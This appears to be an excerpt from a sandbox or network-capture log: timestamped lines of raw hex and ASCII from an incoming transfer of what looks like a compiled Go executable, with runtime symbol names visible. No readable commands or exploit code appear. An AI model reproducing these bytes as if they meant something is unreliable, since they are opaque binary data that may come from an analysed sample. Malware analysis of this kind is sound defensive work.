2022-11-07 22:48:54 UTC	3184	IN	Data Raw: 00 76 01 00 00 ff ff 00 00 d8 00 00 00 d3 02 00 00 19 d9 07 00 a0 01 00 00 ff ff 00 00 d8 00 00 00 d3 02 00 00 ad 0d 08 00 a0 01 00 00 ff ff 00 00 d8 00 00 00 e5 02 00 00 1b d0 07 00 8c 02 00 00 ff ff 00 00 d8 00 00 00 e6 02 00 00 1b d0 07 00 80 02 00 00 ff ff 00 00 d8 00 00 00 d7 02 00 00 1b d0 07 00 b5 02 00 00 03 00 00 00 d9 00 00 00 f4 03 00 00 1b d0 07 00 00 03 00 00 00 00 00 00 d8 00 00 00 a8 02 00 00 44 cd 07 00 4f 03 00 00 ff ff 00 00 e1 00 00 00 8b 00 00 00 10 bb 08 00 59 01 00 00 ff ff 00 00 e1 00 00 00 8c 00 00 00 10 bb 08 00 61 01 00 00 ff ff 00 00 e1 00 00 00 91 00 00 00 31 bb 08 00 97 01 00 00 ff ff 00 00 e1 00 00 00 91 00 00 00 31 bb 08 00 97 01 00 00 ff ff 00 00 e1 00 00 00 91 00 00 00 4b bb 08 00 97 01 00 00 ff ff 00 00 e1 00 00 00 92 00 Data Ascii: vDOYa11K
2022-11-07 22:48:54 UTC	3200	IN	Data Raw: 00 8d 00 00 00 eb 97 0d 00 46 00 00 00 02 00 00 00 06 01 00 00 54 00 00 00 4b 5b 0a 00 47 00 00 00 ff ff 00 00 68 01 00 00 8e 00 00 00 eb 97 0d 00 58 00 00 00 04 00 00 00 06 01 00 00 54 00 00 00 4b 5b 0a 00 59 00 00 00 05 00 00 00 06 01 00 00 27 01 00 00 20 67 05 00 60 01 00 00 05 00 00 00 06 01 00 00 24 01 00 00 20 67 05 00 bc 01 00 00 03 00 00 00 06 01 00 00 27 01 00 00 20 67 05 00 ec 02 00 00 03 00 00 00 06 01 00 00 24 01 00 00 20 67 05 00 42 03 00 00 01 00 00 00 06 01 00 00 27 01 00 00 20 67 05 00 6c 04 00 00 01 00 00 00 06 01 00 00 24 01 00 00 20 67 05 00 c2 04 00 00 ff ff 00 00 af 01 00 00 7f 03 00 00 e6 6b 05 00 66 0d 00 00 ff ff 00 00 af 01 00 00 9f 03 00 00 0d b9 10 00 95 02 00 00 ff ff 00 00 af 01 00 00 a0 03 00 00 2b b9 10 00 f6 02 00 00 ff ff Data Ascii: FTK[GhXTK[Y' g`$ g' g$ gB' gl$ gkf+
2022-11-07 22:48:54 UTC	3216	IN	Data Raw: 00 18 00 00 00 44 0a 00 00 fc f7 01 00 7c 00 00 00 ff ff 00 00 66 01 00 00 39 00 00 00 fb 16 0d 00 28 01 00 00 ff ff 00 00 66 01 00 00 49 00 00 00 db db 0c 00 09 02 00 00 ff ff 00 00 66 01 00 00 66 00 00 00 f5 01 0d 00 09 06 00 00 ff ff 00 00 66 01 00 00 66 00 00 00 8b af 09 00 09 06 00 00 ff ff 00 00 66 01 00 00 6e 00 00 00 f5 01 0d 00 69 06 00 00 ff ff 00 00 66 01 00 00 6e 00 00 00 8b af 09 00 69 06 00 00 ff ff 00 00 66 01 00 00 78 00 00 00 24 17 0d 00 2a 07 00 00 06 00 00 00 63 01 00 00 86 05 00 00 ce e5 05 00 1b 07 00 00 ff ff 00 00 66 01 00 00 7a 00 00 00 db db 0c 00 dd 07 00 00 ff ff 00 00 66 01 00 00 7e 00 00 00 f5 01 0d 00 35 08 00 00 ff ff 00 00 66 01 00 00 7c 00 00 00 20 67 05 00 fe 09 00 00 ff ff 00 00 66 01 00 00 6f 00 00 00 20 67 05 00 0f 0b Data Ascii: D\|f9(fIfffffnifnifx$*cfzf~5f\| gfo g
2022-11-07 22:48:54 UTC	3232	IN	Data Raw: 00 00 01 00 00 61 64 0e 00 0b 0b 00 00 ff ff 00 00 35 00 00 00 64 02 00 00 52 bd 01 00 cd 00 00 00 ff ff 00 00 35 00 00 00 87 02 00 00 62 bd 01 00 e2 00 00 00 ff ff 00 00 35 00 00 00 87 02 00 00 40 b5 01 00 e2 00 00 00 02 00 00 00 35 00 00 00 26 04 00 00 57 b5 01 00 f3 00 00 00 ff ff 00 00 35 00 00 00 56 02 00 00 23 b8 01 00 4c 01 00 00 04 00 00 00 35 00 00 00 be 00 00 00 57 b5 01 00 70 01 00 00 ff ff 00 00 35 00 00 00 57 02 00 00 62 bd 01 00 80 01 00 00 ff ff 00 00 35 00 00 00 5b 02 00 00 65 b8 01 00 a0 01 00 00 ff ff 00 00 35 00 00 00 87 02 00 00 7a bd 01 00 e2 00 00 00 ff ff 00 00 35 00 00 00 95 02 00 00 75 b8 01 00 f0 01 00 00 ff ff 00 00 35 00 00 00 9a 02 00 00 94 b8 01 00 fd 01 00 00 ff ff 00 00 35 00 00 00 a7 02 00 00 94 b8 01 00 60 02 00 00 ff ff Data Ascii: ad5dR5b5@5&W5V#L5Wp5Wb5[e5z5u55`
2022-11-07 22:48:54 UTC	3248	IN	Data Raw: 40 80 00 88 02 00 00 00 00 00 00 00 00 00 00 40 80 00 08 00 00 00 00 00 00 00 00 00 00 00 40 80 04 00 00 00 00 00 00 00 00 00 00 00 00 40 80 00 04 00 00 00 00 00 00 00 00 00 00 00 40 80 00 04 00 00 00 00 00 00 00 00 00 00 00 40 00 20 00 00 00 00 00 00 00 00 00 00 00 00 40 d0 00 04 00 00 00 40 4d 00 00 00 00 00 00 40 80 00 24 00 00 00 40 4d 00 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 ff ff 00 00 65 01 00 00 57 02 00 00 2b f0 0c 00 69 00 00 00 ff ff 00 00 65 01 00 00 5a 02 00 00 88 af 05 00 84 00 00 00 ff ff 00 00 65 01 00 00 5d 02 00 00 50 f0 0c 00 a9 00 00 00 ff ff 00 00 65 01 00 00 64 02 00 00 40 a3 05 00 49 01 00 00 ff ff 00 00 65 01 Data Ascii: @@@@@@ @@M@$@M@@@@eW+ieZe]Ped@Ie
2022-11-07 22:48:54 UTC	3264	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2022-11-07 22:48:54 UTC	3280	IN	Data Raw: 00 00 00 00 00 21 00 00 00 00 00 00 00 8d 98 6e 00 00 00 00 00 1d 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 6f 00 00 00 00 00 38 00 00 00 00 00 00 00 ed 13 Data Ascii: !no8o8o8o8o8o8o8o8o8o8o8o8o8o8
2022-11-07 22:48:54 UTC	3296	IN	Data Raw: 00 00 00 00 00 e8 ff ff ff ff ff ff ff 80 9b 68 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 80 ff ff ff ff ff ff ff 00 fb 68 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 e8 ff ff ff ff ff ff ff c0 b9 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b9 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b9 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b9 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b9 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b9 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 Data Ascii: hhmmmmmm
2022-11-07 22:48:54 UTC	3312	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 c0 ff ff ff ff ff ff ff 00 22 6b 00 00 00 00 00 d8 ff ff ff ff ff ff ff e0 0b 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 d0 ff ff ff ff ff ff ff e0 51 6c 00 00 00 00 00 08 00 00 00 00 00 00 00 60 51 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 e0 ff ff ff ff ff ff ff c0 e1 6a 00 00 00 00 00 f0 ff ff ff ff ff ff ff c0 e1 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 d8 ff ff ff ff ff ff ff 60 c2 68 00 00 00 00 00 e8 ff ff ff ff ff ff ff 40 9c 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: "klQl`Qhjj`h@h
2022-11-07 22:48:54 UTC	3328	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0e 0f ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0d 0e Data Ascii:
2022-11-07 22:48:54 UTC	3344	IN	Data Raw: 04 05 07 07 07 cb 09 00 00 00 01 02 02 02 03 03 04 04 04 04 04 04 04 04 04 d0 09 00 00 00 00 00 00 00 01 01 01 01 01 01 02 02 02 02 02 d2 09 00 00 00 00 01 01 01 01 01 01 01 01 01 02 02 02 02 02 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 09 00 00 00 00 01 01 02 03 04 04 05 06 06 06 06 06 06 06 da 09 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 03 04 05 e1 09 00 00 00 01 03 04 05 05 06 07 08 0a 0b 0c 0c 0d 0f 0f f1 09 00 00 00 01 02 04 05 06 06 07 07 07 08 08 09 09 0a 0b fc 09 00 00 00 01 03 04 05 06 06 06 07 07 07 07 07 07 07 08 05 0a 00 00 00 00 00 00 01 01 01 01 01 02 02 02 02 02 02 02 07 0a 00 00 00 00 00 00 00 00 00 01 01 01 01 01 02 02 03 04 0c 0a 00 00 00 00 00 00 00 00 Data Ascii:
2022-11-07 22:48:54 UTC	3360	IN	Data Raw: 00 00 00 00 00 18 4b 01 00 00 00 00 00 c0 37 40 00 00 00 00 00 00 4c 01 00 00 00 00 00 40 39 40 00 00 00 00 00 c0 4c 01 00 00 00 00 00 c0 3f 40 00 00 00 00 00 f0 4e 01 00 00 00 00 00 e0 3f 40 00 00 00 00 00 50 4f 01 00 00 00 00 00 00 40 40 00 00 00 00 00 b0 4f 01 00 00 00 00 00 20 40 40 00 00 00 00 00 10 50 01 00 00 00 00 00 40 40 40 00 00 00 00 00 70 50 01 00 00 00 00 00 60 40 40 00 00 00 00 00 c8 50 01 00 00 00 00 00 a0 40 40 00 00 00 00 00 28 51 01 00 00 00 00 00 e0 40 40 00 00 00 00 00 80 51 01 00 00 00 00 00 20 41 40 00 00 00 00 00 e0 51 01 00 00 00 00 00 60 41 40 00 00 00 00 00 40 52 01 00 00 00 00 00 a0 41 40 00 00 00 00 00 a0 52 01 00 00 00 00 00 20 42 40 00 00 00 00 00 20 53 01 00 00 00 00 00 a0 42 40 00 00 00 00 00 80 53 01 00 00 00 00 00 20 43 Data Ascii: K7@L@9@L?@N?@PO@@O @@P@@@pP`@@P@@(Q@@Q A@Q`A@@RA@R B@ SB@S C
2022-11-07 22:48:54 UTC	3376	IN	Data Raw: 00 00 00 00 00 08 f4 04 00 00 00 00 00 a0 9b 46 00 00 00 00 00 78 f4 04 00 00 00 00 00 80 9c 46 00 00 00 00 00 e8 f4 04 00 00 00 00 00 60 9d 46 00 00 00 00 00 58 f5 04 00 00 00 00 00 40 9e 46 00 00 00 00 00 c8 f5 04 00 00 00 00 00 20 9f 46 00 00 00 00 00 38 f6 04 00 00 00 00 00 00 a0 46 00 00 00 00 00 a8 f6 04 00 00 00 00 00 e0 a0 46 00 00 00 00 00 18 f7 04 00 00 00 00 00 c0 a1 46 00 00 00 00 00 88 f7 04 00 00 00 00 00 a0 a2 46 00 00 00 00 00 00 f8 04 00 00 00 00 00 c0 a2 46 00 00 00 00 00 50 f8 04 00 00 00 00 00 e0 a2 46 00 00 00 00 00 a0 f8 04 00 00 00 00 00 00 a3 46 00 00 00 00 00 f0 f8 04 00 00 00 00 00 e0 a3 46 00 00 00 00 00 b0 f9 04 00 00 00 00 00 00 a5 46 00 00 00 00 00 a8 fa 04 00 00 00 00 00 40 a5 46 00 00 00 00 00 00 fb 04 00 00 00 00 00 60 a5 Data Ascii: FxF`FX@F F8FFFFFPFFFF@F`
2022-11-07 22:48:54 UTC	3392	IN	Data Raw: 00 00 00 00 00 e8 39 08 00 00 00 00 00 c0 b9 4d 00 00 00 00 00 f0 3a 08 00 00 00 00 00 00 bb 4d 00 00 00 00 00 e8 3b 08 00 00 00 00 00 a0 bc 4d 00 00 00 00 00 00 3d 08 00 00 00 00 00 40 be 4d 00 00 00 00 00 18 3e 08 00 00 00 00 00 40 bf 4d 00 00 00 00 00 d8 3e 08 00 00 00 00 00 40 c0 4d 00 00 00 00 00 98 3f 08 00 00 00 00 00 40 c1 4d 00 00 00 00 00 48 40 08 00 00 00 00 00 40 c2 4d 00 00 00 00 00 d8 40 08 00 00 00 00 00 20 c3 4d 00 00 00 00 00 98 41 08 00 00 00 00 00 e0 c4 4d 00 00 00 00 00 78 42 08 00 00 00 00 00 00 c7 4d 00 00 00 00 00 80 43 08 00 00 00 00 00 40 c9 4d 00 00 00 00 00 00 45 08 00 00 00 00 00 c0 c9 4d 00 00 00 00 00 98 45 08 00 00 00 00 00 c0 cb 4d 00 00 00 00 00 48 46 08 00 00 00 00 00 20 cc 4d 00 00 00 00 00 c0 46 08 00 00 00 00 00 e0 cc Data Ascii: 9M:M;M=@M>@M>@M?@MH@@M@ MAMxBMC@MEMEMHF MF
2022-11-07 22:48:54 UTC	3408	IN	Data Raw: 00 00 00 00 00 00 70 0b 00 00 00 00 00 20 ca 55 00 00 00 00 00 e0 70 0b 00 00 00 00 00 a0 ca 55 00 00 00 00 00 48 71 0b 00 00 00 00 00 60 cc 55 00 00 00 00 00 f8 71 0b 00 00 00 00 00 00 cd 55 00 00 00 00 00 78 72 0b 00 00 00 00 00 e0 cd 55 00 00 00 00 00 f8 72 0b 00 00 00 00 00 20 cf 55 00 00 00 00 00 e0 73 0b 00 00 00 00 00 c0 d1 55 00 00 00 00 00 f0 74 0b 00 00 00 00 00 60 d2 55 00 00 00 00 00 a0 75 0b 00 00 00 00 00 00 d3 55 00 00 00 00 00 28 76 0b 00 00 00 00 00 40 d4 55 00 00 00 00 00 b0 76 0b 00 00 00 00 00 60 d7 55 00 00 00 00 00 98 77 0b 00 00 00 00 00 20 db 55 00 00 00 00 00 70 78 0b 00 00 00 00 00 a0 db 55 00 00 00 00 00 e8 78 0b 00 00 00 00 00 20 dc 55 00 00 00 00 00 58 79 0b 00 00 00 00 00 e0 e2 55 00 00 00 00 00 58 7b 0b 00 00 00 00 00 c0 e3 Data Ascii: p UpUHq`UqUxrUr UsUt`UuU(v@Uv`Uw UpxUx UXyUX{
2022-11-07 22:48:54 UTC	3424	IN	Data Raw: 00 00 00 00 00 d8 8e 0f 00 00 00 00 00 c0 1f 60 00 00 00 00 00 38 95 0f 00 00 00 00 00 20 26 60 00 00 00 00 00 c0 96 0f 00 00 00 00 00 00 27 60 00 00 00 00 00 80 97 0f 00 00 00 00 00 20 28 60 00 00 00 00 00 38 98 0f 00 00 00 00 00 a0 29 60 00 00 00 00 00 18 99 0f 00 00 00 00 00 e0 29 60 00 00 00 00 00 78 99 0f 00 00 00 00 00 00 2a 60 00 00 00 00 00 d8 99 0f 00 00 00 00 00 c0 2c 60 00 00 00 00 00 a0 9a 0f 00 00 00 00 00 80 2d 60 00 00 00 00 00 50 9b 0f 00 00 00 00 00 20 2e 60 00 00 00 00 00 e0 9b 0f 00 00 00 00 00 60 32 60 00 00 00 00 00 28 9e 0f 00 00 00 00 00 60 34 60 00 00 00 00 00 10 9f 0f 00 00 00 00 00 00 36 60 00 00 00 00 00 30 a0 0f 00 00 00 00 00 e0 39 60 00 00 00 00 00 d8 a1 0f 00 00 00 00 00 a0 3b 60 00 00 00 00 00 20 a3 0f 00 00 00 00 00 80 3e Data Ascii: `8 &`'` (`8)`)`x*`,`-`P .``2`(`4`6`09`;` >
2022-11-07 22:48:54 UTC	3440	IN	Data Raw: 03 02 03 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 04 02 04 02 05 04 03 02 03 02 02 02 04 02 03 02 02 02 05 04 04 02 03 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 03 02 05 04 02 02 02 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 05 02 03 02 04 02 03 04 02 02 02 02 02 02 04 02 03 02 02 02 05 04 04 02 02 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 04 02 05 04 03 02 03 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 05 02 03 02 05 02 04 04 03 02 03 02 02 02 04 02 03 02 02 02 05 04 05 02 03 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 05 02 05 04 04 02 04 02 04 02 07 02 06 02 04 02 03 02 02 02 05 04 04 02 02 02 05 02 03 02 06 02 05 04 04 02 04 02 04 02 07 02 02 02 04 02 03 02 02 02 05 04 06 02 04 02 04 02 07 02 06 02 04 02 03 02 02 02 05 08 04 02 02 02 05 Data Ascii:
2022-11-07 22:48:54 UTC	3456	IN	Data Raw: 00 00 00 00 00 91 84 01 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ab 72 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 6d 65 6d 68 61 73 68 46 61 6c 6c 62 61 63 6b 00 72 75 6e 74 69 6d 65 2e 72 65 61 64 55 6e 61 6c 69 67 6e 65 64 36 34 00 72 75 6e 74 69 6d 65 2e 72 6f 74 6c 5f 33 31 00 72 75 6e 74 69 6d 65 2e 72 65 61 64 55 6e 61 6c 69 67 6e 65 64 33 32 00 02 f3 04 00 56 25 33 03 34 23 33 04 34 19 33 04 34 19 33 04 34 14 31 04 32 68 31 13 01 03 34 33 33 03 34 0e 33 03 34 36 31 0b 01 03 34 23 33 03 34 12 31 0b 01 02 34 03 33 02 34 31 31 0b 32 43 00 32 18 02 0d d6 05 03 95 05 03 02 0e 62 04 61 0e 94 05 04 8f 05 03 02 04 5c 04 5b 0e 8e 05 04 89 05 03 02 04 56 04 55 0e 88 05 04 83 05 03 02 04 50 Data Ascii: oo rruntime.memhashFallbackruntime.readUnaligned64runtime.rotl_31runtime.readUnaligned32V%34#34343412h1433434614#341434112C2ba\[VUP
2022-11-07 22:48:54 UTC	3472	IN	Data Raw: 00 02 1e 30 23 2f 01 30 a1 03 2f 01 30 d1 01 2f 0a 00 6c d7 01 47 14 48 01 47 39 48 06 47 51 48 c3 02 00 bc 0c 28 0c 10 02 0a 0c 1d 02 04 06 08 02 15 02 0b 0a 01 c5 08 0b 06 0f c2 08 18 02 19 91 0b 14 9a 0b 01 8d 0b 0c 06 06 03 09 02 14 02 06 02 04 88 0b 06 9b 0b 14 0c 0d 06 07 03 09 02 16 02 06 02 04 8a 0b 07 04 04 8b 0a 08 0a 03 82 0a 07 02 17 06 08 08 11 02 08 06 09 02 0a 29 0e 01 13 bf 08 2c c0 08 05 bf 08 11 05 27 04 03 c2 08 05 c5 08 05 01 09 02 07 b8 08 0e 09 0e 02 09 01 05 19 0a 00 00 09 01 07 02 04 01 06 02 0e 01 92 05 02 05 00 00 d5 03 04 3b 02 a5 01 05 0a 00 00 8c 01 02 1a 01 31 04 14 03 01 04 39 03 06 06 51 05 0b 0a 08 01 03 07 73 02 2c 01 05 02 3b 01 05 02 15 01 34 00 00 00 00 00 00 00 00 a0 0c 41 00 00 00 00 00 40 c4 01 00 08 00 00 00 00 00 Data Ascii: 0#/0/0/lGHG9HGQH(),';19Qs,;4A@
2022-11-07 22:48:54 UTC	3488	IN	Data Raw: 1e 02 01 a3 0f 03 c6 03 08 11 07 ec 0b 05 18 05 83 0c 08 ce 0f 08 e1 03 0a 08 07 14 13 13 03 14 02 12 05 0d 24 02 04 8d 0c 08 ce 0f 08 c3 03 09 0e 18 a1 03 03 a2 03 0d 02 07 bb 08 03 bc 08 16 a8 02 08 87 02 09 db 08 03 de 08 03 02 01 f1 0f 03 fe 0e 03 eb 07 08 d2 09 0a 9e 02 08 87 03 06 04 09 0e 09 0c 04 74 0a 55 03 1d 06 3c 07 02 0a 02 0f da 01 09 08 14 a7 0b 03 a8 0b 13 02 0d 08 07 08 09 02 03 02 01 04 04 d3 12 04 d4 12 02 02 03 01 04 04 01 d7 12 03 d4 12 07 1c 0d 02 14 9f 05 03 aa 05 06 c7 0f 1e 08 09 0a 19 02 0b 04 07 bc 0f 04 02 03 1c 09 02 12 99 0e 04 01 0a 02 03 9e 0e 04 d3 13 03 d6 13 05 2e 08 23 05 06 57 08 19 01 0c 02 0a 02 0d 04 01 f3 13 14 a4 14 08 1f 29 23 0a 22 0a 02 10 02 01 d1 0e 05 02 03 01 05 b3 05 04 a4 14 24 eb 0e 05 08 16 bf 05 08 a4 Data Ascii: $tU<.#W)#"$
2022-11-07 22:48:54 UTC	3504	IN	Data Raw: 04 df 01 01 e0 01 e6 01 df 01 0f 00 8a 01 51 4d 0f 4e 1b 4d 07 4e a8 01 47 01 02 09 46 28 4d 04 4e 7b 45 0e 46 18 47 05 48 9f 01 4d 05 4e 80 01 00 fe 04 28 1c 06 06 23 8a 04 0f 87 04 0a 07 04 08 0d 98 04 07 97 04 09 08 04 04 0f 04 0e 02 05 05 05 04 07 02 02 06 09 02 0c 12 21 08 15 1b 05 26 0d 11 05 22 09 a5 05 01 0f 09 b8 05 1a 02 06 0e 08 d2 01 04 d1 01 09 0f 05 10 10 0a 13 06 3a 0f 05 0f 05 20 05 04 01 c9 05 0e 82 05 05 13 05 26 04 11 05 11 05 f7 03 05 9c 04 25 31 0a 54 05 21 06 04 4a 02 1b 28 05 35 3b 02 19 0b 0d 2b 0a 01 06 21 0f 00 00 af 02 04 25 03 38 04 4e 03 0a 02 47 01 0a 06 e6 01 05 0f 00 00 51 02 0f 01 1b 04 07 03 a8 01 06 01 02 09 07 28 0a 04 09 7b 0e 0e 0d 18 0c 05 0b 9f 01 10 05 0f 80 01 00 00 00 00 00 00 00 00 e0 f9 41 00 00 00 00 00 48 44 Data Ascii: QMNMNGF(MN{EFGHMN(#!&": &%1T!J(5;+!%8NGQ({AHD
2022-11-07 22:48:54 UTC	3520	IN	Data Raw: 00 33 83 02 00 01 00 00 00 00 00 00 02 3b 83 02 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 63 6c 6f 62 62 65 72 66 72 65 65 00 02 1f 00 84 01 1f 00 e8 0d 0e 02 07 01 0a 00 01 1f 00 00 00 40 6a 42 00 00 00 00 00 80 83 02 00 08 00 00 00 00 00 00 00 97 83 02 00 a2 83 02 00 a6 83 02 00 02 00 00 00 00 00 00 02 b8 83 02 00 c7 83 02 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 28 2a 67 63 57 6f 72 6b 29 2e 69 6e 69 74 00 02 1a 20 3d 1f 01 20 0b 1f 07 00 82 01 6a 00 ea 01 24 02 11 02 0b 02 05 06 09 02 0a 05 0b 07 07 00 00 09 01 07 02 04 01 02 02 0e 01 44 02 02 00 00 24 02 3f 01 07 00 00 00 c0 6a 42 00 00 00 00 00 10 84 02 00 10 00 00 00 00 00 00 00 26 84 02 00 31 84 02 00 36 84 02 00 02 00 Data Ascii: 3;ooruntime.clobberfree@jBooruntime.(*gcWork).init = j$D$?jB&16
2022-11-07 22:48:54 UTC	3536	IN	Data Raw: 02 1e 50 7f 4f 01 50 2b 4f 01 50 1b 4f 0b 00 98 01 f0 01 00 4e 28 02 12 06 0c 02 04 04 04 01 07 02 19 02 04 02 0c 05 0d 06 13 04 2c 11 1c 03 0a 00 00 a7 01 04 3f 03 0a 00 00 00 00 00 60 da 42 00 00 00 00 00 70 c3 02 00 20 00 00 00 00 00 00 00 8c c3 02 00 98 c3 02 00 9d c3 02 00 02 00 00 00 00 00 00 02 be c3 02 00 ce c3 02 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 28 2a 70 61 67 65 43 61 63 68 65 29 2e 61 6c 6c 6f 63 4e 00 02 1e 60 9d 01 5f 01 60 47 5f 0b 00 98 01 8e 02 00 76 28 02 22 02 0a 06 20 02 1e 02 07 02 04 02 1f 0f 05 08 05 02 0e 06 08 03 0a 01 02 05 1c 05 0a 00 00 09 01 07 02 04 01 06 02 0e 01 e1 01 02 05 00 00 3f 02 c5 01 01 0a 00 00 00 80 db 42 00 00 00 00 00 38 c4 02 00 10 00 00 00 00 00 00 00 53 c4 02 00 69 c4 Data Ascii: POP+OPON(,?`Bp ooruntime.(*pageCache).allocN`_`G_v(" ?B8Si
2022-11-07 22:48:54 UTC	3552	IN	Data Raw: 00 08 00 00 00 00 00 00 00 4d 03 03 00 5d 03 03 00 61 03 03 00 02 00 00 00 00 00 00 04 87 03 03 00 97 03 03 00 c8 8e 6f 00 00 00 00 00 9c a0 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 84 73 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 67 65 74 70 72 6f 63 63 6f 75 6e 74 00 02 1e e0 01 c4 01 df 01 01 e0 01 0d df 01 0b 00 30 fb 01 00 bc 05 28 02 12 02 33 02 08 0a 03 01 10 02 04 01 03 02 04 03 03 04 03 03 07 0a 05 0a 12 02 1a 02 12 0b 0e 17 0a 00 00 09 01 07 02 04 01 06 02 0e 01 ce 01 02 05 00 00 62 02 6a 02 25 03 0a 00 a0 3a 43 00 00 00 00 00 e0 03 03 00 10 00 00 00 00 00 00 00 f0 03 03 00 fb 03 03 00 ff 03 03 00 02 00 00 00 00 00 00 02 0b 04 03 00 1a 04 03 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 6f 73 52 65 6c 61 78 00 02 1a Data Ascii: M]aoosruntime.getproccount0(3bj%:Cooruntime.osRelax
